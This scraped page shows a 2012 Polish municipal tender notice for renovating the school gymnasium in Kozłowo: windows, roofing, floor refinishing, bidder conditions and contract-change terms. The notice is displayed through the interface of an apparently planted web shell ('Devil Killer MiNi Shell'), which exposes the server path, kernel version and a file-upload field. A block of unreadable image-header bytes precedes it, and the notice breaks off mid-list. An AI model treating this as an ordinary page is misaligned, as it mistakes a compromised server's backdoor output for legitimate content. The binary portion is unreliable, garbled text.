JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121015/399368-N-2012.html

<p class="kh_header"><b>Kozłowo: Remont budynku sali gimnastycznej przy Zespole Szkolno Przedszkolnym w Kozłowie</b><br>
<b>Numer ogłoszenia: 399368 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kozłowo , Kozłowo 60A, 13-124 Kozłowo, woj. warmińsko-mazurskie, tel. 89 6267505, faks 89 6267502.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku sali gimnastycznej przy Zespole Szkolno Przedszkolnym w Kozłowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Remont budynku sali gimnastycznej przy Zespole Szkolno Przedszkolnym w Kozłowie.
Zakres prac obejmuje min:
-	demontaż istniejącej starej stolarki okiennej i drzwiowej drewnianej
-	demontaż parapetów zewnętrznych z blachy ocynkowanej
-	dostawę i montaż kompletnej, nowej stolarki okiennej z PCV oraz drzwiowej z aluminium (ciepłego) w kolorze białym. Szczegółowo opis stolarki okiennej i drzwiowej został podany w załączniku nr 1 do SIWZ. Stolarka wykonana z profili minimum pięciokomorowych. Charakter stolarki oraz jej funkcjonalność wg. Załącznika nr 1 do SIWZ.
-	montaż nowych parapetów zewnętrznych z blachy stalowej powlekanej w kolorze ciemny brąz. Wszystkie parapety zewnętrzne mają mieć jednolity wygląd, kolor oraz
być wykonane z jednego odcinka blachy. Szerokość nowych parapetów powinna uwzględniać 15 centymetrowe docieplenie budynku w przyszłości.
-	wyrównanie , naprawę i malowanie tynków oraz gładzi wewnątrz i na zewnątrz otworów okiennych i drzwiowych po wymianie stolarki
-	wywóz i utylizację zdemontowanej stolarki okiennej i drzwiowej, parapetów zewnętrznych oraz gruzu i innych odpadów, które powstaną na skutek działań Wykonawcy w trakcie realizacji zamówienia.
-	demontaż rynien dachowych z blachy stalowej ocynkowanej w ilości 74,85m oraz rur spustowych z blachy stalowej ocynkowanej w ilości 44m
-	demontaż obróbek z blachy stalowej ocynkowanej w ilości 80m2
-	pokrycie dachów papą termozgrzewalną gr. 4,2 mm z gruntowaniem podłoża emulsją asfaltową-jednowarstwowo w ilości 551m2
-	montaż rynien dachowych z blachy stalowej ocynkowanej o śr. 15 cm w ilości 74,85m
-	montaż rur spustowych z blachy stalowej ocynkowanej o śr. 10 cm  w ilości 44,0 m
-	montaż obróbek blacharskich z blachy stalowej ocynkowanej w ilości 109,38 m2


-	dwukrotne cyklinowanie parkietu sali gimnastycznej o wym. 23,60mx11,50 m wraz z przygotowaniem powierzchni 
-	trzykrotne lakierowanie (lakierem chemoutwardzalnym) stosownym dla obiektów sportowych powierzchni parkietu wcześniej przygotowanego o wym. 23,60mx11,50m wraz z oblistwowaniem
-	odtworzenie istniejących linii wyznaczających pola do gry (kolorystyka tożsama z istniejącą)
-	w kole środkowym, wykonać napis o treści ZSP Kozłowo im. M. Z. Malewskiej.
Wykonana warstwa lakieru powinna zapewniać jednolitą, antypoślizgową powierzchnię odporną na ścieranie, wolną od rys i zadrapań. 
Podane wymiary są wymiarami poglądowymi i w celu precyzyjnego oszacowania wartości oferty Zamawiający zaleca dokonanie wizji lokalnej na przedmiotowym obiekcie. Nieoszacowanie lub pominięcie któregokolwiek z elementów przedmiotu zamówienia nie zwalnia Wykonawcy z wykonania całości przedmiotu zamówienia.
1.1. Zamawiający informuje, że prace będą mogły być prowadzone w godzinach 8-15 oraz w pozostałych godzinach, które szczegółowo muszą być uzgodnione z Zamawiającym.
1.1.1 Gdziekolwiek w opisie przedmiotu zamówienia SIWZ występują odniesienia do Polskich Norm, dopuszczalne jest stosowanie odpowiednich norm krajów Unii Europejskiej, w zakresie przyjętym przez polskie prawodawstwo.
1.2 Obowiązkiem wykonawcy będzie dostarczenie wszystkich niezbędnych dokumentów
      wraz    ze    stosownymi   atestami   (    przede    wszystkim   atestem   higienicznym),
      certyfikatami,  aprobatami technicznymi i gwarancjami  na wbudowane  materiały
     ( najpóźniej w dniu zgłoszenia zadania do odbioru technicznego), które wraz z
     podpisanym przez wyznaczoną komisję protokółem odbioru końcowego i prawidłowo
     wystawioną fakturą  VAT  będzie  podstawą     do   wypłacenia  wynagrodzenia  dla
     Wykonawcy.
1.3 Wykonawca zobowiązany jest  udzielić   gwarancji   jakości   na   przedmiot zamówienia (tj. roboty budowlane i wbudowane materiały) na okres co najmniej 36 miesięcy, z tym   że jeśli gwarancja producenta na wbudowane materiały jest dłuższa, wówczas obowiązującą jest gwarancja producenta.
1.4	Zamawiający dopuszcza możliwość zaoferowania materiałów o parametrach
równoważnych,  lecz nie gorszych niż określone w zał. nr 1 do SIWZ przy czym
Wykonawca  jest   zobowiązany   załączyć   stosowne   karty   zawierające   parametry techniczne tych materiałów w celu porównania ich równoważności.
1.5	Wykonawca zobowiązany jest do wykonania zamówienia w sposób rzetelny i
terminowy, zgodnie z zasadami sztuki budowlanej, przepisami technicznymi,
zasadami bhp i ppoż., obowiązującymi normami technicznymi, przepisami prawa
budowlanego oraz zaleceniami Zamawiającego.
1.6	Wykonawca zobowiązany jest do zabezpieczenia terenu budowy pod względem bhp i ppoż. oraz do ponoszenia odpowiedzialności wobec Zamawiającego i osób trzecich za szkody powstałe w trakcie realizacji zamówienia
1.7	Wykonawca zobowiązany jest do zabezpieczenia terenu budowy przed wejściem osób trzecich oraz czytelnego oznaczenia budowy.
1.8	Wykonawca zrealizuje zamówienie z materiałów nowych, własnych, przy czym
muszą  one posiadać   wymagane   prawem   certyfikaty,   atesty   i   zaświadczenia   o
dopuszczeniu zastosowanych materiałów do stosowania w budownictwie zgodnie z art. 10 ustawy z  dnia 07.07.1994r. Prawo budowlane ze zm.
1.9	 Wykonawca jest zobowiązany na uzasadnione żądanie Zamawiającego lub Inspektora
Nadzoru do przedłożenia dowodów zakupu materiałów podstawowych i atestów
stwierdzających zgodność użytych materiałów z obowiązującymi normami oraz przedłożenia na zakupione przez siebie materiały kart gwarancyjnych i wszelkich innych dokumentów koniecznych do realizacji uprawnień wobec producenta lub sprzedawcy materiałów.
1.10	 Wykonawcę zobowiązuje się do przerwania robót na żądanie Zamawiającego oraz
zabezpieczenie wykonanych robót.
1.11 Wykonawca zobowiązany jest do bieżącego utrzymania porządku w    
        pomieszczeniach, w których wymieniana będzie stolarka oraz do uporządkowania   
        terenu  po zakończeniu całości robót. 
1.12 Wykonawca zobowiązany jest do zapewnienia dostępu na teren oraz miejsc  
        gdzie są prowadzone roboty budowlane lub gdzie przewiduje się ich wykonanie   
        pracownikowi nadzoru budowlanego lub Państwowej Inspekcji Pracy, a także  
        przeprowadzania wizytacji i kontroli na każdym etapie realizacji zamówienia.
1.13	Wykonawca zobowiązany jest do dostosowania się do decyzji Zamawiającego i
powołanego przez niego Inspektora Nadzoru, którzy na każdym etapie realizacji zamówienia będą mogli przerwać prace na skutek zastosowania materiałów, które nie będą zgodne z wymaganiami określonymi w rozdziale I art.10 ust.1 ustawy z dnia 7 lipca 1994 r. Prawo budowlane ze zm. Rezygnacja powinna nastąpić pisemnie, niezwłocznie po stwierdzeniu niezgodności. Zastosowane materiały inne niż wyżej wymienione po stwierdzeniu nieprawidłowości Wykonawca niezwłocznie zdemontuje na koszt własny.
1.14	Wykonawca jest  zobowiązany    dostarczyć    na    żądanie    Inspektora    Nadzoru
Zamawiającego własnym kosztem i staraniem wszelkie pomiary, atesty i niezbędne
badania wykonane przez właściwe i niezależne jednostki badawcze..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.22-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia, że wykonawca posiada uprawnienia do
wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu
na podstawie ustawy, żąda załączenia do oferty następujących dokumentów;
-	oświadczenie z art. 22 ust 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo
zamówień publicznych - załącznik nr 3 do SIWZ ( w przypadku wspólnego
ubiegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców do
oferty muszą być złożone oświadczenia przez każdego z nich)
     -  oświadczenie o nie podleganiu wykluczeniu z przedmiotowego postępowania na 
    podstawie art. 24 ust. 1 w związku z art. 22 ust.1 pkt. 4 ustawy Prawo zamówień publicznych - załącznik nr 4 do SIWZ ( w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców do oferty muszą być złożone oświadczenia przez każdego z nich)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia
oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania
zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje)
-sporządzenia i załączenia do oferty wykazu wykonanych robót budowlanych w
okresie ostatnich trzech lat,  a jeżeli okres prowadzenia działalności jest krótszy w
tym okresie, co najmniej jedną robotę budowlaną o wartości, co najmniej 50 000  zł brutto,  odpowiadającą  swoim   rodzajem robotom stanowiącym przedmiot zamówienia,  z  podaniem  ich  wartości    oraz  daty  i  miejsca  wykonania  oraz załączenie dokumentów potwierdzających ich   należyte wykonanie ( referencje, protokoły odbioru, itp.) załącznik nr 5 do SIWZ

-sporządzenia i załączenia  do   oferty  wykazu  osób,  które  będą    wykonywać
zamówienie   lub   będą   uczestniczyć   w   wykonywaniu   zamówienia   wraz   z
informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia 
( załącznik nr 6 do SIWZ)
-	informacje na temat podwykonawców ( załącznik nr 7 do SIWZ), wypełnić
jeżeli Wykonawca będzie realizował zamówienie przy pomocy podwykonawców.
-	w przypadku korzystania z potencjału innych podmiotów Wykonawca
przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia
swego potencjału na czas realizacji zamówienia (załącznik nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia
oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania
zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje)
-sporządzenia i załączenia do oferty wykazu wykonanych robót budowlanych w
okresie ostatnich trzech lat,  a jeżeli okres prowadzenia działalności jest krótszy w
tym okresie, co najmniej jedną robotę budowlaną o wartości, co najmniej 50 000  zł brutto,  odpowiadającą  swoim   rodzajem robotom stanowiącym przedmiot zamówienia,  z  podaniem  ich  wartości    oraz  daty  i  miejsca  wykonania  oraz załączenie dokumentów potwierdzających ich   należyte wykonanie ( referencje, protokoły odbioru, itp.) załącznik nr 5 do SIWZ

-sporządzenia i załączenia  do   oferty  wykazu  osób,  które  będą    wykonywać
zamówienie   lub   będą   uczestniczyć   w   wykonywaniu   zamówienia   wraz   z
informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia 
( załącznik nr 6 do SIWZ)
-	informacje na temat podwykonawców ( załącznik nr 7 do SIWZ), wypełnić
jeżeli Wykonawca będzie realizował zamówienie przy pomocy podwykonawców.
-	w przypadku korzystania z potencjału innych podmiotów Wykonawca
przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia
swego potencjału na czas realizacji zamówienia (załącznik nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia
oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania
zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje)
-sporządzenia i załączenia do oferty wykazu wykonanych robót budowlanych w
okresie ostatnich trzech lat,  a jeżeli okres prowadzenia działalności jest krótszy w
tym okresie, co najmniej jedną robotę budowlaną o wartości, co najmniej 50 000  zł brutto,  odpowiadającą  swoim   rodzajem robotom stanowiącym przedmiot zamówienia,  z  podaniem  ich  wartości    oraz  daty  i  miejsca  wykonania  oraz załączenie dokumentów potwierdzających ich   należyte wykonanie ( referencje, protokoły odbioru, itp.) załącznik nr 5 do SIWZ

-sporządzenia i załączenia  do   oferty  wykazu  osób,  które  będą    wykonywać
zamówienie   lub   będą   uczestniczyć   w   wykonywaniu   zamówienia   wraz   z
informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia 
( załącznik nr 6 do SIWZ)
-	informacje na temat podwykonawców ( załącznik nr 7 do SIWZ), wypełnić
jeżeli Wykonawca będzie realizował zamówienie przy pomocy podwykonawców.
-	w przypadku korzystania z potencjału innych podmiotów Wykonawca
przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia
swego potencjału na czas realizacji zamówienia (załącznik nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia, ze wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia żąda załączenia do oferty następujących dokumentów.
Ocena spełnienia tego warunku nastąpi w oparciu o:
-złożone oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiących załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>PEŁEN WYKAZ DOKUMENTÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO ZAWARTY JEST W SPECYFIKACJI ISTOTNYCH WARUNKÓW ZAMÓWIENIA.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej SIWZ oraz danych zawartych w ofercie. Zamawiający podpisze umowę z Wykonawcą, który przedłoży najkorzystniejszą ofertę. Zamawiający zastrzega sobie prawo zmian nieistotnych treści umowy oraz zmian dotyczących;
1.   Zmiana terminu realizacji przedmiotu umowy
1.1	zmiany spowodowane warunkami atmosferycznymi, w szczególności:
1.1.1	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych
zgodnie z wymaganiami, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
1.1.2	klęski żywiołowe;
1.2	zmiany	spowodowane	warunkami	geologicznymi,	terenowymi,
archeologicznymi, wodnymi itp. w szczególności:
1.2.1	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał, itp.);
1.2.2	odmienne od przyjętych w dokumentacji projektowej warunki terenowe w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
1.2.3	niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
1.2.4	wykopaliska archeologiczne, szkody górnicze, nie przewidywane w SIWZ ;
1.3      zmiany       będące       następstwem       okoliczności       leżących       po       stronie Zamawiającego, w szczególności
1.3.1   wstrzymanie realizacji umowy przez Zamawiającego;
1.3.2   konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej  
           lub dokumentacji technicznej urządzeń;
1.4      zmiany będące następstwem działania organów administracji, w szczególności:
1.4.1	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
1.4.2	wydanie postanowienia o wstrzymaniu robót budowlanych, w przypadku o którym mowa w art. 50 ust. l ustawy Prawo budowlane
1.4.3	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego - konieczności nie przewidywano przy zawieraniu umowy
1.4.4	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy






1 .5     inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia działań w celu wykonania umowy
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1.1 -1.5 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty.
2    Zmiany osobowe
2.1	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane, prawo geologiczne i górnicze lub innych ustawach,
2.2	zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące   się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ
3.	Zmiany organizacji spełniania świadczenia
3.1  zmiana zasad dokonywania odbiorów świadczonych usług lub robót, jeśli nie zmniejszy to zasad bezpieczeństwa i nie spowoduje zwiększenia kosztów dokonywania odbiorów, które obciążałyby Zamawiającego;
3.2. zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej realizacji umowy;
4.	Płatności
4.1 zmiany terminów płatności wynikające z wszelkich zmian wprowadzanych do umowy, a także zmiany samoistne o ile nie spowodują konieczności zapłaty Wykonawcy odsetek wyższych niż odsetki od lokat na rachunku bieżącym zamawiającego;
